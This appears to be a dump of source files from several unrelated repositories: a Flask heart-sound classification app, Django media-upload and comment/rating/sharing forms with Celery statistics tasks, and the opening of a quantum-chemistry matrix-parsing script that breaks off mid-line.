#### File: AAboElkhair/MyDoctor_Project/app_heart.py ```python import os from flask import Flask,jsonify,request,render_template,redirect from heart_sound import predict from werkzeug.utils import secure_filename app = Flask(__name__) ## __name__= current file name (main) @app.route("/", methods = ["GET", "POST"]) ## page name def index(): prediction = "" if request.method == "POST": print("FORM DATA RECEIVED") if "file" not in request.files: return redirect(request.url) file = request.files["file"] if file.filename == "": return redirect(request.url) if file: app.config['Audio_UPLOADS'] = "" file = request.files['file'] filename = secure_filename(file.filename) file.save(os.path.join(app.config["Audio_UPLOADS"], filename)) actual_file = filename prediction = predict(actual_file) print(prediction) return render_template('index.html', prediction=prediction) app.run(debug=False, threaded = True) ``` #### File: AAboElkhair/MyDoctor_Project/heart_sound.py ```python import numpy as np import librosa import librosa.display import tensorflow as tf CLASSES = ['artifact','murmur','normal'] NB_CLASSES=len(CLASSES) label_to_int = {k:v for v,k in enumerate(CLASSES)} int_to_label = {v:k for k,v in label_to_int.items()} model = None def load_model(): model = tf.keras.models.load_model("heart_sounds1-Copy1.h5") print("Model loaded") return model def preprocessing (file_path, duration=10, sr=22050): input_length=sr*duration process_file=[] X, sr = librosa.load(file_path, sr=sr, duration=duration) dur = librosa.get_duration(y=X, sr=sr) # pad audio file same duration if (round(dur) < duration): y = librosa.util.fix_length(X, input_length) mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sr, n_mfcc=40, n_fft=512,hop_length=2048).T,axis=0) feature = np.array(mfccs).reshape([-1,1]) process_file.append(feature) process_file_array = np.asarray(process_file) return process_file_array def predict(file_path): global model if model is None: model = load_model() process_audio = preprocessing(file_path) pred = np.asarray(model.predict(process_audio, batch_size=32)) prediction_val = np.argmax(pred,axis=1) prediction = "prediction test return :"+ str(prediction_val)+ "-"+str(int_to_label[prediction_val[0]]) return prediction ```
{ "source": "aaboffill/django-allmedia", "score": 2 }
#### File: django-allmedia/media/forms.py ```python import json from django import forms from django.forms.util import ErrorList from django.utils.translation import ugettext_lazy as _ from . import settings from .fields.tags import ModelMultiTagSelectChoiceField from .validators import FileFieldValidator from .decorators import ajax_file_upload from .models import MediaAlbum, Image, Video, MediaTag, Attachment, AjaxFileUploaded, YoutubeVideo class MediaAlbumForm(forms.ModelForm): """ Form to add a media album """ class Meta: model = MediaAlbum fields = ('name', 'location', 'private') class MediaForm(forms.ModelForm): """ Form to add a media object """ tags = ModelMultiTagSelectChoiceField( register_choice=True, queryset=MediaTag.on_site.all(), required=False, help_text=_(u"Enter tag's name.") ) class Meta: fields = ('caption', 'private', 'file', 'tags', 'creator') widgets = { 'creator': forms.HiddenInput(), } def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False, instance=None): super(MediaForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted, instance) self.fields['file'].widget.template_with_initial = '%(input)s' class ObjectMediaForm(MediaForm): class Meta(MediaForm.Meta): fields = ('content_type', 'object_pk', 'caption', 'private', 'file', 'tags', 'creator') class MediaAdminForm(forms.ModelForm): pass # IMAGE FORMS class ImageForm(MediaForm): """ Form to add an image """ class Meta(MediaForm.Meta): model = Image @ajax_file_upload(form_file_field_name="file", content_type="image") class ImageAjaxUploadForm(ImageForm): pass class ObjectImageForm(ObjectMediaForm): class Meta(ObjectMediaForm.Meta): model = Image @ajax_file_upload(form_file_field_name="file", content_type="image") class ObjectImageAjaxUploadForm(ObjectImageForm): pass class ImageAdminForm(MediaAdminForm): class Meta: model = Image # VIDEO FORMS class VideoForm(MediaForm): """ Form to add a video """ class Meta(MediaForm.Meta): model = Video @ajax_file_upload(form_file_field_name="file", content_type="video") class VideoAjaxUploadForm(VideoForm): pass class ObjectVideoForm(ObjectMediaForm): class Meta(ObjectMediaForm.Meta): model = Video @ajax_file_upload(form_file_field_name="file", content_type="video") class ObjectVideoAjaxUploadForm(ObjectVideoForm): pass class VideoAdminForm(MediaAdminForm): class Meta: model = Video # YOUTUBE VIDEO FORMS class YoutubeVideoForm(MediaForm): """ Form to add a video """ class Meta(MediaForm.Meta): model = YoutubeVideo def save(self, commit=True): self.instance.file.field.tags = [tag.name for tag in self.cleaned_data['tags']] return super(YoutubeVideoForm, self).save(commit) @ajax_file_upload(form_file_field_name="file", content_type="video") class YoutubeVideoAjaxUploadForm(YoutubeVideoForm): pass class ObjectYoutubeVideoForm(ObjectMediaForm): class Meta(ObjectMediaForm.Meta): model = YoutubeVideo def save(self, commit=True): self.instance.file.field.tags = [tag.name for tag in self.cleaned_data['tags']] return super(ObjectYoutubeVideoForm, self).save(commit) @ajax_file_upload(form_file_field_name="file", content_type="video") class ObjectYoutubeVideoAjaxUploadForm(ObjectYoutubeVideoForm): pass class YoutubeVideoAdminForm(MediaAdminForm): class Meta: model = YoutubeVideo def save(self, commit=True): self.instance.file.field.tags = [tag.name for tag in self.cleaned_data['tags']] return super(YoutubeVideoAdminForm, self).save(commit) # ATTACHMENT FORMS class AttachmentForm(MediaForm): class Meta(MediaForm.Meta): model = Attachment @ajax_file_upload(form_file_field_name="file", content_type="all") class AttachmentAjaxUploadForm(AttachmentForm): pass class ObjectAttachmentForm(ObjectMediaForm): class Meta(ObjectMediaForm.Meta): model = Attachment @ajax_file_upload(form_file_field_name="file", content_type="all") class ObjectAttachmentAjaxUploadForm(ObjectAttachmentForm): pass class AttachmentAdminForm(MediaAdminForm): class Meta: model = Attachment class TagForm(forms.ModelForm): """ Form to add a media tag """ class Meta: model = MediaTag fields = ('name',) class AjaxFileUploadedForm(forms.ModelForm): class Meta: model = AjaxFileUploaded fields = ('file',) def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False, instance=None, content="all"): super(AjaxFileUploadedForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted, instance) # setting file validators self.fields['file'].validators.append(FileFieldValidator( mime_types=settings.MEDIA_STATICFILES_FORMATS[content]['types'], max_size=settings.MEDIA_STATICFILES_FORMATS[content]['size'] )) ``` #### File: django-allmedia/media/views.py ```python from django.utils.encoding import force_text from django.views.generic import View, TemplateView from django.utils.translation import ugettext_lazy as _ from django.core.cache import cache from .forms import AjaxFileUploadedForm from .models import YoutubeVideo, YoutubeUploadProgress from .mixins import JSONResponseMixin class HandleAjaxFileUploadedView(JSONResponseMixin, View): def post(self, request, *args, **kwargs): try: content = request.POST.get('content', "all") form = AjaxFileUploadedForm(request.POST, request.FILES, content=content) if form.is_valid(): model = form.save() return self.render_to_response({ 'result': True, 'object_pk': model.pk }) messages = {} for i in xrange(len(form.errors)): item_error_list = form.errors.items()[i][1] for j in xrange(len(item_error_list)): messages.update({j: force_text(item_error_list[j])}) return self.render_to_response({ 'result': False, 'failedMsgs': messages }) except Exception as e: return self.render_to_response({ 'result': False, 'failedMsgs': {1: force_text(_(u"A problem has occurred while trying to save the uploaded file."))} }) class HandleYoutubeProcessingView(JSONResponseMixin, View): def get(self, request, *args, **kwargs): video_id = kwargs['video_id'] try: return self.render_to_response({ 'result': True, 'processed': YoutubeVideo.objects.get(pk=video_id).is_processed }) except YoutubeVideo.DoesNotExist: return self.render_to_response({ 'result': False, 'failedMsgs': {1: force_text(_(u"The video specified with id:%s does not exist.") % video_id)} }) class YoutubeUploadProcessView(TemplateView): def get_context_data(self, **kwargs): context = super(YoutubeUploadProcessView, self).get_context_data(**kwargs) try: if cache: progress = cache.get(self.request.session.session_key) else: progress = YoutubeUploadProgress.objects.get(session_key=self.request.session.session_key) context.update({ 'youtube_upload_status': progress.progress_data if isinstance(progress, YoutubeUploadProgress) else progress }) except YoutubeUploadProgress.DoesNotExist: pass except: pass return context ``` #### File: django-allmedia/test/views.py ```python from django.contrib.contenttypes.models import ContentType from django.http import HttpResponseRedirect from django.views.generic import ListView, CreateView, DetailView, UpdateView, TemplateView from media.decorators import use_youtube_api from media.models import YoutubeVideo class ListMediaItem(ListView): context_object_name = 'media' def get_context_data(self, **kwargs): context = super(ListMediaItem, self).get_context_data(**kwargs) context.update({ 'create_url': 'create_%s' % self.model.__name__.lower(), 'create_multi_url': 'create_%s_multi' % self.model.__name__.lower(), 'update_url': 'update_%s' % self.model.__name__.lower(), 'detail_url': 'detail_%s' % self.model.__name__.lower(), 'delete_url': 'delete_%s' % self.model.__name__.lower(), 'detail_multi_url': 'detail_%s_multi' % self.model.__name__.lower(), 'label': self.model.__name__.upper() }) return context class CreateMedia(CreateView): def get_context_data(self, **kwargs): context = super(CreateMedia, self).get_context_data(**kwargs) context.update({ 'list_url': 'list_%s' % self.model.__name__.lower(), }) return context @use_youtube_api(['model']) def form_valid(self, form): """ If the form is valid, save the associated model. """ mock_ct = ContentType.objects.get_for_model(self.request.user) self.object = form.save(commit=False) self.object.content_type = mock_ct self.object.object_pk = self.request.user.pk self.object.save() form.save_m2m() return HttpResponseRedirect(self.get_success_url()) # CreateMedia.form_valid = use_youtube_api(CreateMedia.form_valid, models=['model']) class UpdateMedia(UpdateView): def get_context_data(self, **kwargs): context = super(UpdateMedia, self).get_context_data(**kwargs) context.update({ 'list_url': 'list_%s' % self.model.__name__.lower(), }) return context @use_youtube_api(['model']) def form_valid(self, form): return super(UpdateMedia, self).form_valid(form) class DetailMedia(DetailView): context_object_name = 'media' def get_context_data(self, **kwargs): context = super(DetailMedia, self).get_context_data(**kwargs) context.update({ 'label': self.model.__name__.upper() }) return context #################################################################################### from django.forms.formsets import formset_factory class CreateMultipleYoutubeVideos(CreateView): def __init__(self, **kwargs): super(CreateMultipleYoutubeVideos, self).__init__(**kwargs) self.formset = formset_factory(self.form_class, extra=2) def get_context_data(self, **kwargs): context = super(CreateMultipleYoutubeVideos, self).get_context_data(**kwargs) context.update({'formset': self.formset}) return context def post(self, request, *args, **kwargs): formset = self.formset(request.POST, request.FILES) if formset.is_valid(): return self.form_valid(formset) else: return self.form_invalid(formset) @use_youtube_api(['formset.form.Meta.model']) def form_valid(self, formset): for form in formset: mock_ct = ContentType.objects.get_for_model(self.request.user) object = form.save(commit=False) object.content_type = mock_ct object.object_pk = self.request.user.pk object.save() form.save_m2m() return HttpResponseRedirect(self.success_url) def form_invalid(self, formset): return self.render_to_response(self.get_context_data(formset=formset)) class ShowMultipleYoutubeVideos(TemplateView): def get_context_data(self, **kwargs): context = super(ShowMultipleYoutubeVideos, self).get_context_data(**kwargs) context.update({'youtube_videos': YoutubeVideo.objects.all()}) return context ```
{ "source": "aaboffill/django-content-interactions", "score": 2 }
#### File: django-content-interactions/content_interactions/forms.py ```python import time from django import forms from django.conf import settings from django.contrib.auth.models import User from django.contrib.contenttypes.models import ContentType from django.contrib.sites.models import Site from django.core.exceptions import ValidationError, ImproperlyConfigured from django.utils.crypto import salted_hmac, constant_time_compare from django.utils.encoding import force_str from django.forms.util import ErrorList, ErrorDict from django.utils.translation import ugettext_lazy as _, ungettext, ugettext from django.utils.text import get_text_list from models import Comment class ShareForm(forms.Form): content_type = forms.ModelChoiceField(ContentType.objects.all(), widget=forms.HiddenInput()) object_pk = forms.IntegerField(widget=forms.HiddenInput()) user = forms.ModelChoiceField(User.objects.all(), widget=forms.HiddenInput()) addressee = forms.CharField(max_length=5000, required=False) comment = forms.CharField(max_length=500, widget=forms.Textarea(attrs={'rows': 4}), required=False) def clean_addressee(self): addressee = self.cleaned_data.get('addressee', "") self.addressee_list = addressee.split(',') if addressee != "" else [] return addressee def clean(self): cleaned_data = super(ShareForm, self).clean() self.content_object = cleaned_data['content_type'].get_object_for_this_type(pk=cleaned_data['object_pk']) return cleaned_data def share(self): from signals import item_shared if self.addressee_list: item_shared.send( self.content_object.__class__, instance=self.content_object, user=self.cleaned_data['user'], addressee_list=self.addressee_list, comment=self.cleaned_data['comment'] ) class RateForm(forms.Form): content_type = forms.ModelChoiceField(ContentType.objects.all(), widget=forms.HiddenInput()) object_pk = forms.CharField(widget=forms.HiddenInput()) rating = forms.IntegerField(widget=forms.HiddenInput(), min_value=1, max_value=5) comment = forms.CharField(max_length=500, widget=forms.Textarea(attrs={'rows': 4}), required=False) def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False): super(RateForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted) self.user = initial.get('user', None) def save_rating(self): obj = self.cleaned_data['content_type'].get_object_for_this_type( **{'pk': self.cleaned_data['object_pk']} ) if obj.rated_by(self.user): obj.change_rate(self.user, self.cleaned_data['rating'], self.cleaned_data['comment']) else: obj.save_rate(self.user, self.cleaned_data['rating'], self.cleaned_data['comment']) class DenounceForm(forms.Form): content_type = forms.ModelChoiceField(ContentType.objects.all(), widget=forms.HiddenInput()) object_pk = forms.CharField(widget=forms.HiddenInput()) comment = forms.CharField(max_length=500, widget=forms.Textarea(attrs={'rows': 4}), required=False) def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False): super(DenounceForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted) self.user = initial.get('user', None) def clean(self): self.obj = self.cleaned_data['content_type'].get_object_for_this_type( **{'pk': self.cleaned_data['object_pk']} ) if not self.obj.denounced_by(self.user) and not self.cleaned_data.get('comment', None): self._errors['comment'] = self.error_class(["This file is required."]) return self.cleaned_data def save_denounce(self): if not self.obj.denounced_by(self.user): self.obj.denounce(self.user, self.cleaned_data['comment']) return True else: self.obj.remove_denounce(self.user) return False DEFAULT_COMMENTS_TIMEOUT = getattr(settings, 'COMMENTS_TIMEOUT', (2 * 60 * 60)) class CommentForm(forms.ModelForm): timestamp = forms.IntegerField(widget=forms.HiddenInput) security_hash = forms.CharField(min_length=40, max_length=40, widget=forms.HiddenInput) honeypot = forms.CharField( required=False, label=_('If you enter anything in this field your comment will be treated as spam') ) class Meta(object): model = Comment fields = ('content_type', 'object_pk', 'site', 'user', 'user_name', 'user_email', 'comment', 'answer_to') widgets = { 'content_type': forms.HiddenInput(), 'object_pk': forms.HiddenInput(), 'site': forms.HiddenInput(), 'user': forms.HiddenInput(), 'answer_to': forms.HiddenInput(), } def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False, instance=None): if not instance: self._initial_validate(initial) initial.update(self._generate_security_data(instance or initial)) super(CommentForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted, instance) def _initial_validate(self, initial): if not 'content_type' in initial: raise ImproperlyConfigured( 'Expect "content_type" within initial to initialize content_interactions.forms.CommentForm.' ) if not 'object_pk' in initial: raise ImproperlyConfigured( 'Expect "object_pk" within initial to initialize content_interactions.forms.CommentForm.' ) def _generate_security_data(self, content): """Generate a dict of security data for "initial" data.""" content_type = str(content.content_type.pk if isinstance(content, Comment) else content.get('content_type').pk) object_pk = str(content.object_pk if isinstance(content, Comment) else content.get('object_pk')) timestamp = str(int(time.time())) security_dict = { 'timestamp': timestamp, 'security_hash': self._generate_security_hash(content_type, object_pk, timestamp) } return security_dict def _generate_security_hash(self, content_type, object_pk, timestamp): """ Generate a HMAC security hash from the provided info. """ return salted_hmac( key_salt="content_interactions.forms.CommentForm", value="-".join([content_type, object_pk, timestamp]) ).hexdigest() def clean_comment(self): """ If COMMENTS_ALLOW_PROFANITIES is False, check that the comment doesn't contain anything in PROFANITIES_LIST. """ comment = self.cleaned_data["comment"] if (not getattr(settings, 'COMMENTS_ALLOW_PROFANITIES', False) and getattr(settings, 'PROFANITIES_LIST', False)): bad_words = [w for w in settings.PROFANITIES_LIST if w in comment.lower()] if bad_words: raise forms.ValidationError(ungettext( "Watch your mouth! The word %s is not allowed here.", "Watch your mouth! The words %s are not allowed here.", len(bad_words)) % get_text_list( ['"%s%s%s"' % (i[0], '-' * (len(i) - 2), i[-1]) for i in bad_words], ugettext('and'))) return comment def clean_security_hash(self): """Check the security hash.""" security_hash_dict = { 'content_type': self.data.get("content_type", ""), 'object_pk': self.data.get("object_pk", ""), 'timestamp': self.data.get("timestamp", ""), } expected_hash = self._generate_security_hash(**security_hash_dict) actual_hash = self.cleaned_data["security_hash"] if not constant_time_compare(expected_hash, actual_hash): raise forms.ValidationError(_(u"Security hash check failed.")) return actual_hash def clean_timestamp(self): """Make sure the timestamp isn't too far (default is > 2 hours) in the past.""" timestamp = self.cleaned_data["timestamp"] if time.time() - timestamp > DEFAULT_COMMENTS_TIMEOUT: raise forms.ValidationError(_(u"Timestamp check failed")) return timestamp def clean_honeypot(self): """Check that nothing's been entered into the honeypot.""" value = self.cleaned_data["honeypot"] if value: raise forms.ValidationError(self.fields["honeypot"].label) return value def clean_user_name(self): value = self.cleaned_data['user_name'] if not value and not self.cleaned_data['user']: raise forms.ValidationError(_(u"This field is required.")) return value def clean_user_email(self): value = self.cleaned_data['user_email'] if not value and not self.cleaned_data['user']: raise forms.ValidationError(_(u"This field is required.")) return value try: from social_publisher.models import SocialNetwork from social_publisher.provider import ActionMessageProvider, MessageProvider from social_publisher.utils import social_networks_by_user, CONTENT_CLASS from tasks import social_networks_publish_action_message, social_networks_publish_message class ShareSocialNetworkForm(forms.Form): content_type = forms.ModelChoiceField(ContentType.objects.all(), widget=forms.HiddenInput(), required=False) object_pk = forms.IntegerField(widget=forms.HiddenInput(), required=False) user = forms.ModelChoiceField(User.objects.all(), widget=forms.HiddenInput()) social_networks = forms.MultipleChoiceField( choices=[], required=False, label=_(u'Social Networks'), help_text=_(u"Select Social Networks") ) comment = forms.CharField( max_length=500, widget=forms.Textarea(attrs={'rows': 2}), required=False, help_text=_(u"Type a comment for your publication.") ) action = forms.CharField(max_length=50, required=False, widget=forms.HiddenInput()) verb = forms.CharField(max_length=50, required=False, widget=forms.HiddenInput()) provider_type = forms.CharField(max_length=50, widget=forms.HiddenInput()) def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False): super(ShareSocialNetworkForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted) if initial: if 'social_networks' in initial and initial['social_networks'] and isinstance( initial['social_networks'], (list, set, tuple) ): self.initial['social_networks'] = [sn.pk for sn in initial['social_networks']] if 'user' not in initial or not initial['user']: raise ImproperlyConfigured("The user must be defined in the initial content.") if not isinstance(initial['user'], User): raise ImproperlyConfigured("The user must be an instance of django User.") if 'provider_type' not in initial or not initial['provider_type']: raise ImproperlyConfigured("The provider_type must be defined in the initial content.") self.fields['social_networks'].choices = self.fields['social_networks'].choices + [ (sn.pk, sn.name) for sn in social_networks_by_user(initial['user'], initial['provider_type']) ] if data: user_key = self.prefix + '-user' if self.prefix else 'user' provider_type_key = self.prefix + '-provider_type' if self.prefix else 'provider_type' if data[user_key] and data[provider_type_key]: self.fields['social_networks'].choices = self.fields['social_networks'].choices + [ (sn.pk, sn.name) for sn in social_networks_by_user( User.objects.get(pk=data[user_key]), force_str(data[provider_type_key]) ) ] def clean(self): cleaned_data = super(ShareSocialNetworkForm, self).clean() if ('comment' in cleaned_data and (not cleaned_data['comment'] or cleaned_data['comment'] == "")) and cleaned_data['social_networks']: self._errors['social_networks'] = self.error_class( [_(u"You must type a comment to post in (%s).") % ' ,'.join([sn.name for sn in SocialNetwork.objects.filter(pk__in=cleaned_data['social_networks'])])] ) if cleaned_data['provider_type'] and CONTENT_CLASS[cleaned_data['provider_type']] == ActionMessageProvider: if not cleaned_data['action'] or cleaned_data['action'] == "": self._errors['action'] = self.error_class([_(u"This field is required.")]) if not cleaned_data['verb'] or cleaned_data['verb'] == "": self._errors['verb'] = self.error_class([_(u"This field is required.")]) if cleaned_data['content_type'] and cleaned_data['object_pk']: self.content_object = cleaned_data['content_type'].get_object_for_this_type(pk=cleaned_data['object_pk']) return cleaned_data def share(self, content_object=None): comment = self.cleaned_data.get('comment', None) social_networks = self.cleaned_data.get('social_networks', None) content_object = content_object or self.content_object if comment and comment != "" and social_networks and social_networks and content_object: site_pk = Site.objects.get_current().pk content_type = self.cleaned_data['content_type'] or ContentType.objects.get_for_model(content_object) if (CONTENT_CLASS[self.cleaned_data['provider_type']] == ActionMessageProvider): social_networks_publish_action_message.delay( message=comment, content_type_pk=content_type.pk, object_pk=content_object.pk, user_pk=self.cleaned_data['user'].pk, site_pk=site_pk, social_network_ids=social_networks, action=self.cleaned_data['action'], verb=self.cleaned_data['verb'] ) elif (CONTENT_CLASS[self.cleaned_data['provider_type']] == MessageProvider): social_networks_publish_message.delay( message=comment, content_type_pk=content_type.pk, object_pk=content_object.pk, user_pk=self.cleaned_data['user'].pk, site_pk=site_pk, social_network_ids=social_networks, ) except ImportError: pass ``` #### File: django-content-interactions/content_interactions_stats/handlers.py ```python from django.contrib.contenttypes.models import ContentType from settings import ( CONTENT_INTERACTIONS_LIKE_PROCESSING_DELAY, CONTENT_INTERACTIONS_RATE_PROCESSING_DELAY, CONTENT_INTERACTIONS_FAVORITE_PROCESSING_DELAY, CONTENT_INTERACTIONS_DENOUNCE_PROCESSING_DELAY, CONTENT_INTERACTIONS_SHARE_PROCESSING_DELAY, CONTENT_INTERACTIONS_COMMENT_PROCESSING_DELAY, CONTENT_INTERACTIONS_VISIT_PROCESSING_DELAY, ) # noinspection PyUnresolvedReferences,PyUnusedLocal def like_handler(instance, **kwargs): if CONTENT_INTERACTIONS_LIKE_PROCESSING_DELAY: try: from tasks import item_like_process item_like_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_like_process as sync_item_like_process sync_item_like_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def dislike_handler(instance, **kwargs): if CONTENT_INTERACTIONS_LIKE_PROCESSING_DELAY: try: from tasks import item_dislike_process item_dislike_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_dislike_process as sync_item_dislike_process sync_item_dislike_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def new_rating_handler(instance, rating, **kwargs): if CONTENT_INTERACTIONS_RATE_PROCESSING_DELAY: try: from tasks import item_new_rating_process item_new_rating_process.delay(instance.pk, ContentType.objects.get_for_model(instance), rating) return except ImportError: pass from utils import item_new_rating_process as sync_item_new_rating_process sync_item_new_rating_process(instance.pk, ContentType.objects.get_for_model(instance), rating) # noinspection PyUnresolvedReferences,PyUnusedLocal def updated_rating_handler(instance, rating, old_rating, **kwargs): if CONTENT_INTERACTIONS_RATE_PROCESSING_DELAY: try: from tasks import item_updated_rating_process item_updated_rating_process.delay( instance.pk, ContentType.objects.get_for_model(instance), old_rating, rating ) return except ImportError: pass from utils import item_updated_rating_process as sync_item_updated_rating_process sync_item_updated_rating_process(instance.pk, ContentType.objects.get_for_model(instance), old_rating, rating) # noinspection PyUnresolvedReferences,PyUnusedLocal def update_cached_rating(instance, **kwargs): instance.rating = ( 5 * instance.rating_5_count + 4 * instance.rating_4_count + 3 * instance.rating_3_count + 2 * instance.rating_2_count + instance.rating_1_count )/(instance.ratings * float(1)) if instance.ratings else 0 return instance # noinspection PyUnresolvedReferences,PyUnusedLocal def favorite_mark_handler(instance, **kwargs): if CONTENT_INTERACTIONS_FAVORITE_PROCESSING_DELAY: try: from tasks import item_marked_favorite_process item_marked_favorite_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_marked_favorite_process as sync_item_marked_favorite_process sync_item_marked_favorite_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def favorite_unmark_handler(instance, **kwargs): if CONTENT_INTERACTIONS_FAVORITE_PROCESSING_DELAY: try: from tasks import item_unmarked_favorite_process item_unmarked_favorite_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_unmarked_favorite_process as sync_item_unmarked_favorite_process sync_item_unmarked_favorite_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def denounce_handler(instance, **kwargs): if CONTENT_INTERACTIONS_DENOUNCE_PROCESSING_DELAY: try: from tasks import item_denounced_process item_denounced_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_denounced_process as sync_item_denounced_process sync_item_denounced_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def denounce_remove_handler(instance, **kwargs): if CONTENT_INTERACTIONS_DENOUNCE_PROCESSING_DELAY: try: from tasks import item_denounce_removed_process item_denounce_removed_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_denounce_removed_process as sync_item_denounce_removed_process sync_item_denounce_removed_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def share_handler(instance, **kwargs): if CONTENT_INTERACTIONS_SHARE_PROCESSING_DELAY: try: from tasks import item_shared_process item_shared_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_shared_process as sync_item_shared_process sync_item_shared_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def comment_handler(instance, user, answer_to, **kwargs): commented_item = instance.content_object if CONTENT_INTERACTIONS_COMMENT_PROCESSING_DELAY: try: from tasks import item_got_comment_process item_got_comment_process.delay(commented_item.pk, ContentType.objects.get_for_model(commented_item)) return except ImportError: pass from utils import item_got_comment_process as sync_item_got_comment_process sync_item_got_comment_process(commented_item.pk, ContentType.objects.get_for_model(commented_item)) # noinspection PyUnresolvedReferences,PyUnusedLocal def comment_deleted_handler(instance, **kwargs): commented_item = instance.content_object if CONTENT_INTERACTIONS_COMMENT_PROCESSING_DELAY: try: from tasks import item_comment_deleted_process item_comment_deleted_process.delay(commented_item.pk, ContentType.objects.get_for_model(commented_item)) return except ImportError: pass from utils import item_comment_deleted_process as sync_item_comment_deleted_process sync_item_comment_deleted_process(commented_item.pk, ContentType.objects.get_for_model(commented_item)) # noinspection PyUnresolvedReferences,PyUnusedLocal def visit_handler(instance, **kwargs): if CONTENT_INTERACTIONS_VISIT_PROCESSING_DELAY: try: from tasks import item_visited_process item_visited_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_visited_process as sync_item_visited_process sync_item_visited_process(instance.pk, ContentType.objects.get_for_model(instance)) ``` #### File: django-content-interactions/content_interactions_stats/tasks.py ```python from celery import shared_task @shared_task(name='content_interactions.like_process') def item_like_process(item_id, item_content_type): from content_interactions_stats.utils import item_like_process item_like_process(item_id, item_content_type) @shared_task(name='content_interactions.dislike_process') def item_dislike_process(item_id, item_content_type): from content_interactions_stats.utils import item_dislike_process item_dislike_process(item_id, item_content_type) @shared_task(name='content_interactions.new_rating_process') def item_new_rating_process(item_id, item_content_type, rating): from content_interactions_stats.utils import item_new_rating_process item_new_rating_process(item_id, item_content_type, rating) @shared_task(name='content_interactions.update_rating_process') def item_updated_rating_process(item_id, item_content_type, old_rating, rating): from content_interactions_stats.utils import item_updated_rating_process item_updated_rating_process(item_id, item_content_type, old_rating, rating) @shared_task(name='content_interactions.mark_favorite_process') def item_marked_favorite_process(item_id, item_content_type): from content_interactions_stats.utils import item_marked_favorite_process item_marked_favorite_process(item_id, item_content_type) @shared_task(name='content_interactions.unmark_favorite_process') def item_unmarked_favorite_process(item_id, item_content_type): from content_interactions_stats.utils import item_unmarked_favorite_process item_unmarked_favorite_process(item_id, item_content_type) @shared_task(name='content_interactions.share_process') def item_shared_process(item_id, item_content_type): from content_interactions_stats.utils import item_shared_process item_shared_process(item_id, item_content_type) @shared_task(name='content_interactions.denounce_process') def item_denounced_process(item_id, item_content_type): from content_interactions_stats.utils import item_denounced_process item_denounced_process(item_id, item_content_type) @shared_task(name='content_interactions.denounce_removed_process') def item_denounce_removed_process(item_id, item_content_type): from content_interactions_stats.utils import item_denounce_removed_process item_denounce_removed_process(item_id, item_content_type) @shared_task(name='content_interactions.comment_process') def item_got_comment_process(item_id, item_content_type): from content_interactions_stats.utils import item_got_comment_process item_got_comment_process(item_id, item_content_type) @shared_task(name='content_interactions.comment_deleted_process') def item_comment_deleted_process(item_id, item_content_type): from content_interactions_stats.utils import item_comment_deleted_process item_comment_deleted_process(item_id, item_content_type) @shared_task(name='content_interactions.visit_process') def item_visited_process(item_id, item_content_type): from content_interactions_stats.utils import item_visited_process item_visited_process(item_id, item_content_type) ```
{ "source": "aaboutaka/Data-Extraction-Codes", "score": 3 }
#### File: aaboutaka/Data-Extraction-Codes/SVD-MOOvlp.py ```python import math import cmath import numpy as np np.set_printoptions(suppress=True) from numpy import array from numpy import diag from numpy import dot from numpy import zeros import sys ########## if len(sys.argv) < 5 or len(sys.argv) > 5 : print('You need 5 arguments: name of the file, 1st filname, "1/-1 for Alpha or Beta' ', 2nd filename, and "1/-1 for Alpha or Beta"') sys.exit(0) #### # This function will grab NBasis def NBasGrab(filename): NBasis = 0 with open(filename, 'r') as f: if filename.endswith('.fmat'): for line in f: if "NBasis" in line: words = line.split() for i in words: NBasis = int(words[3]) elif filename.endswith('.fchk'): for line in f: if "Number of basis functions" in line: words = line.split() NBasis = int(words[5]) # print (NBasis) else: print('The file extension is not supported. This script only supports fchk and fmat.') return NBasis # This function will grab the Alpha or Beta MO Matrix def MatGrab(filename,switch): # Get number of basis functions NBasis=NBasGrab(filename) ################################# with open(filename,'r') as f: # FMAT FILES if filename.endswith('.fmat'): # Initializing variables for fmat file Exlines = int(math.ceil(NBasis/5)) MOlines =int(Exlines+(NBasis*Exlines)) MOlista=[] MOlistb=[] MOFull=[] MOA=[] MOB=[] if (switch == 1): # Extract Alpha MO coefficient for line in f: if "ALPHA MO 